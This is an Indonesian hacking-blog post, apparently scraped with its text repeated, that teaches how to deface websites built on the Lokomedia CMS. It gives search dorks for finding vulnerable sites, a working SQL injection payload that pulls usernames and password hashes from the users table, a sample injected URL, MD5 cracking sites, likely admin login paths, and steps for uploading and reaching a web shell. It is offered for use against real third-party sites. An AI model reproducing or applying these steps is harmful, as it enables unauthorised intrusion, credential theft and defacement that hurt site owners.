Malem fanss :* Malem juga haters :p
Mr.4NDR00T-DC update lagi nih :* Kali ini gw mau share Tutorial Deface Metode KCFINDER upload shell Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Lokomedia di grup FB Mr.4NDR00T-DC. Gw bingung gimana sih kok bisa dapet segitu banyak :v Wkwk :v
Baca juga: Daftar Bug Telkomsel Terbaru aktif 2018.
Oke, simak langsung aja ya :)
Bahan :
1. Dork :
Dork lengkap tunggu post selanjutnya :*
2. Exploit
3. MD5 Decrypter
KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI!
Bercanda :v Ada tools online nya kok :p
Tutorial:
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
4. Kalo vuln jadinya bakal kek gini.
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di:
7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!
8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.
9. Jan lupa pasang nick gw di Script lu :v Mr.4NDR00T-DC & Daeng soCiety Team :)
Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Pembuat: Mr.4NDR00T-DC
Team: Daeng soCiety Team
Pemilik Blogger: Muh Faldi I.
Mr.4NDR00T-DC update lagi nih :* Kali ini gw mau share Tutorial Deface Metode KCFINDER upload shell Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Lokomedia di grup FB Mr.4NDR00T-DC. Gw bingung gimana sih kok bisa dapet segitu banyak :v Wkwk :v
Baca juga: Daftar Bug Telkomsel Terbaru aktif 2018.
Oke, simak langsung aja ya :)
Bahan :
1. Dork :
inurl:/statis-1-profil.htmlKembangin lagi biar dapet yg VULN + Perawan :p
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Dork lengkap tunggu post selanjutnya :*
2. Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
3. MD5 Decrypter
KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI!
Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
Tutorial:
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+Gatau caranya? :v Sini gw ajarin :p
http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
4. Kalo vuln jadinya bakal kek gini.
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!
8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.
9. Jan lupa pasang nick gw di Script lu :v Mr.4NDR00T-DC & Daeng soCiety Team :)
Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Pembuat: Mr.4NDR00T-DC
Team: Daeng soCiety Team
Pemilik Blogger: Muh Faldi I.
Komentar
Posting Komentar